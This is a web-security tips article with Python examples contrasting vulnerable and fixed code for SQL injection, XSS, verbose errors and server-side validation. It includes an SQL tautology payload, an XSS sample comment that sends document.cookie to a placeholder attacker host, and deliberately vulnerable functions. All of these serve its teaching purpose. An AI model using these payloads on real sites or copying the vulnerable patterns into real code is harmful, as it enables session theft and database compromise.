You may think that your site is of no interest to hackers, but attacks on such “uninteresting” sites happen all the time. Most of them are not aimed at stealing your data. Instead, attackers want to use your server as an intermediary: to send spam e-mail, to host a temporary web server that serves illegal files, to act as a node in a botnet, or to mine cryptocurrency.

Your site can also be hit by ransomware, which encrypts your data and demands payment to restore it.

Much of this hacking is carried out by automated scripts that scan the Internet for known vulnerabilities in common software and exploit them wherever they are found.

Here are five tips that you can follow to better protect your site.


1. Update your software

It may seem obvious, but keeping all software up to date is vital to keeping your site secure. This applies both to the server operating system and to any software you run on your site, such as a CMS or forum. When a vulnerability in software you run is made public, attackers begin probing for it almost immediately.

If you’re using managed hosting, you don’t have to worry too much about security updates for your operating system, as this is handled by the hosting company; do confirm what the provider actually covers, because the applications you install are usually still your responsibility.

If you use third-party software on your site, such as a CMS or forum, you should keep an eye out for security patches and apply them regularly.

Most vendors have a newsletter or RSS feed in which they announce security issues. WordPress, Umbraco, and many other CMSes notify you of available updates every time you log in.

2. Watch out for possible SQL injection

SQL injection is an attack in which the attacker uses a form field or URL parameter to run SQL of their own against your database. If you build queries by concatenating user input into the SQL text (for example, in hand-written Transact-SQL), a single quote character in the input ends the string literal and everything after it is parsed as SQL. The injected fragment can then be used to alter tables, read data, or delete it.

This can be prevented by always using parameterized queries, in which the query text is fixed and the values are sent to the database separately, so they are never parsed as SQL. Most web languages provide this, and it is easy to use.
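The difference between the two approaches, as an added example (not code from the original article): a Python function that concatenates the username into the SQL text beside one that binds it as a parameter, both run against a constructed in-memory SQLite table. The table, its rows and the payload are made up for the demonstration.

```python
import sqlite3


# Constructed in-memory sample database (not from the article), standing in for a site's user table.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, is_admin INTEGER)")
    conn.executemany(
        "INSERT INTO users (username, is_admin) VALUES (?, ?)",
        [("alice", 1), ("bob", 0), ("carol", 0)],
    )
    conn.commit()
    return conn


def find_user_vulnerable(conn: sqlite3.Connection, username: str) -> list:
    # String concatenation: the user's input becomes part of the SQL text, so a
    # quote character in the input ends the literal and the rest is parsed as SQL.
    query = "SELECT id, username FROM users WHERE username = '" + username + "'"
    return conn.execute(query).fetchall()


def find_user_safe(conn: sqlite3.Connection, username: str) -> list:
    # Parameterized query: the SQL text is fixed and the value is bound separately,
    # so the driver never parses the input as SQL, whatever characters it contains.
    return conn.execute(
        "SELECT id, username FROM users WHERE username = ?", (username,)
    ).fetchall()


# A classic tautology payload typed into a "username" form field or URL parameter.
PAYLOAD = "x' OR '1'='1"


def demo() -> dict:
    conn = make_db()
    return {
        "vulnerable": find_user_vulnerable(conn, PAYLOAD),  # every row comes back
        "safe": find_user_safe(conn, PAYLOAD),              # no user is literally named that
        "legit": find_user_safe(conn, "bob"),               # normal lookups still work
    }


if __name__ == "__main__":
    for label, rows in demo().items():
        print(f"{label}: {rows}")
```

The concatenated version returns every row because the quote in the payload closes the string literal and the `OR '1'='1'` that follows is parsed as SQL. The parameterized version sends the same bytes as a value and finds nothing. The same split applies to any driver or ORM: if the query text is assembled from user input, parameterization is the fix; escaping or stripping quotes is not.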


3. Protection against XSS attacks

Cross-site scripting (XSS) is an attack that injects malicious JavaScript into your pages, which then runs in your users’ browsers. Such a script can modify the page content, steal information such as session cookies or form input, and send it to the attacker.

For example, if you display comments on a page without escaping them, an attacker could leave a comment containing a script tag and JavaScript code. That code would run in the browser of every user who views the page and could steal their login cookie.

That would let the attacker take over the session of every user who views the page with the malicious comment. You need to make sure that users cannot insert active JavaScript content into your pages: escape user-supplied text for the context in which it is rendered, and mark session cookies HttpOnly so that scripts cannot read them.

This is especially important in modern web applications, which build pages largely from user-generated content and in many cases also generate HTML that is then interpreted by frontend frameworks such as Angular and Ember.

These frameworks provide some protection against XSS, but mixing server-side and client-side rendering creates opportunities for new, more sophisticated attacks.
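As an added example (not the article’s own code): a Python renderer that inserts a comment into a page unescaped beside one that escapes it, with a small check that parses the result the way a browser would and reports script-capable constructs. The comments, including the malicious ones and the attacker host name, are constructed for the demonstration.

```python
import html
from html.parser import HTMLParser

# Constructed sample comments (not from the article); the second and third are what an
# attacker might post. The attacker host name is a placeholder.
COMMENTS = [
    "Great post, thanks!",
    '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>',
    'Click <a href="javascript:alert(document.cookie)">here</a> for a prize',
]


def render_comment_vulnerable(text: str) -> str:
    # Interpolates the raw comment into the page: any markup the user typed is
    # sent to every visitor's browser and executed there.
    return f'<li class="comment">{text}</li>'


def render_comment_safe(text: str) -> str:
    # html.escape turns <, >, &, " and ' into character references, so the browser
    # displays the characters instead of parsing them as tags or attributes.
    return f'<li class="comment">{html.escape(text, quote=True)}</li>'


class ActiveContentDetector(HTMLParser):
    """Parses rendered HTML the way a browser would and records script-capable constructs."""

    DANGEROUS_TAGS = {"script", "iframe", "object", "embed"}

    def __init__(self) -> None:
        super().__init__()
        self.findings: list = []

    def handle_starttag(self, tag: str, attrs: list) -> None:
        if tag in self.DANGEROUS_TAGS:
            self.findings.append(f"<{tag}> tag")
        for name, value in attrs:
            if name.startswith("on"):  # onclick=, onerror=, onload=, ...
                self.findings.append(f"{name} handler on <{tag}>")
            if name in ("href", "src") and value and value.strip().lower().startswith("javascript:"):
                self.findings.append(f"javascript: URL in {name} of <{tag}>")


def active_content(rendered_html: str) -> list:
    # Returns a list of findings; an empty list means nothing executable was parsed.
    detector = ActiveContentDetector()
    detector.feed(rendered_html)
    detector.close()
    return detector.findings


def demo() -> dict:
    return {
        "vulnerable": [active_content(render_comment_vulnerable(c)) for c in COMMENTS],
        "safe": [active_content(render_comment_safe(c)) for c in COMMENTS],
    }


if __name__ == "__main__":
    for label, results in demo().items():
        print(label, results)
```

`html.escape` is correct for text inside an element and inside quoted attributes. It does not make user input safe inside a `<script>` block, a URL or an event-handler attribute; each of those contexts needs its own encoding, which is where templating engines with automatic, context-aware escaping earn their keep. Marking the session cookie `HttpOnly` keeps `document.cookie` away from injected scripts, but does not stop them from acting on the user’s behalf within the page.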


4. Pay attention to error messages

Be careful about how much information you give out in your error messages. Show your users only the bare minimum, so that you don’t leak sensitive data from your server (e.g., API keys or database passwords).

Also, don’t return exception details such as stack traces or raw database error text to the client, as they make more sophisticated attacks, such as SQL injection, much easier: they tell the attacker exactly how their input was interpreted. Log the full detail on the server instead, where you can look it up when a user reports a problem.
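An added example (not from the article) of that pattern in Python: a stub database that raises a verbose driver error, a handler that passes the error straight to the client, and a hardened handler that logs the full detail under a reference id and returns only the id. The host name, user and password in the error text are made up.

```python
import io
import logging
import traceback
import uuid

# Constructed example (not from the article). The "database" below is a stub that raises
# the kind of verbose driver error a real one might, with a made-up host and password.
LOG_BUFFER = io.StringIO()  # stands in for the server's log file
logger = logging.getLogger("site.errors")
logger.setLevel(logging.ERROR)
logger.addHandler(logging.StreamHandler(LOG_BUFFER))


class DatabaseError(Exception):
    pass


def run_query(sql: str) -> None:
    raise DatabaseError(
        "connection db-primary:5432 as user 'app' (password 's3cr3t'): "
        f"syntax error near unexpected token in: {sql}"
    )


def handle_request_verbose(sql: str) -> tuple:
    # Leaky handler: the raw exception text and stack trace go straight to the client,
    # confirming to an attacker exactly how their input was interpreted.
    try:
        run_query(sql)
        return 200, "ok"
    except Exception as exc:
        return 500, f"Internal error: {exc}\n{traceback.format_exc()}"


def handle_request_safe(sql: str) -> tuple:
    # Hardened handler: full detail is written to the server log under a reference id;
    # the client receives only the id, which support staff can use to find the entry.
    try:
        run_query(sql)
        return 200, "ok"
    except Exception:
        ref = uuid.uuid4().hex
        logger.exception("request failed, reference %s", ref)
        return 500, f"Something went wrong. Reference: {ref}"


SECRET_MARKERS = ("password", "Traceback", "syntax error", ":5432")


def leaks_server_details(body: str) -> bool:
    # Crude check for strings that must never reach a client; useful as a test assertion.
    return any(marker in body for marker in SECRET_MARKERS)


if __name__ == "__main__":
    probe = "SELECT * FROM users WHERE id = ''"
    print(handle_request_verbose(probe)[1])
    print(handle_request_safe(probe)[1])
    print("server log:", LOG_BUFFER.getvalue())
```

The reference id is the piece people tend to skip: without it, a generic message leaves support with no way to correlate a user’s report with the log entry, and the temptation to turn verbose errors back on in production returns.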

5. Do both backend and frontend validation

Validation should always be done on both sides. The browser can catch simple things, such as empty form fields or text entered into a numeric field, and give the user quick feedback. But client-side checks can be bypassed by anyone who sends requests to your server directly, so the real validation must be done server-side.

Without server-side validation, malicious input can reach your database and cause undesirable site behavior.
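A server-side validator for a signup form, as an added Python example (not the article’s code). It allowlists each field, converts the age to an integer only after checking that it is plain ASCII digits, and copies only the expected fields into the clean result, so a submission crafted to skip the browser checks, or to smuggle in a field like `is_admin`, is rejected or stripped. The submissions are constructed.

```python
import re

# Allowlist patterns: state exactly what is acceptable rather than trying to list what is not.
USERNAME_RE = re.compile(r"[a-z0-9_]{3,20}")
EMAIL_RE = re.compile(r"[^@\s]+@[^@\s]+\.[^@\s]+")
# Explicit ASCII digits: int() alone also accepts "1_0", "+5" and non-ASCII digit characters.
AGE_RE = re.compile(r"[0-9]{1,3}")


def validate_signup(form: dict) -> dict:
    """Server-side validation of a signup form. Returns an ok flag, per-field errors and
    a clean data dict that contains only the fields we expect, with proper types."""
    errors = {}
    data = {}

    username = str(form.get("username", "")).strip()
    if USERNAME_RE.fullmatch(username):
        data["username"] = username
    else:
        errors["username"] = "3-20 lowercase letters, digits or underscores"

    email = str(form.get("email", "")).strip()
    if len(email) <= 254 and EMAIL_RE.fullmatch(email):
        data["email"] = email
    else:
        errors["email"] = "must be a valid e-mail address"

    raw_age = str(form.get("age", "")).strip()
    if not AGE_RE.fullmatch(raw_age):
        errors["age"] = "must be a whole number"
    elif not 13 <= int(raw_age) <= 120:
        errors["age"] = "must be between 13 and 120"
    else:
        data["age"] = int(raw_age)

    # Fields the form never asked for (e.g. is_admin) are simply not copied into data.
    return {"ok": not errors, "errors": errors, "data": data}


# Constructed submissions (not from the article). BYPASSED is what a client that skipped
# the browser-side checks might send.
GOOD = {"username": "alice_01", "email": "alice@example.com", "age": "34", "is_admin": "1"}
BYPASSED = {"username": "<script>alert(1)</script>", "email": "not-an-email", "age": "12abc"}


if __name__ == "__main__":
    print(validate_signup(GOOD))
    print(validate_signup(BYPASSED))
```

The validator is deliberately separate from output escaping: it decides what is stored, while the rendering layer decides how stored text is shown. A username that passes `[a-z0-9_]{3,20}` still gets escaped on output, and an e-mail address that passes the pattern still gets bound as a query parameter.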
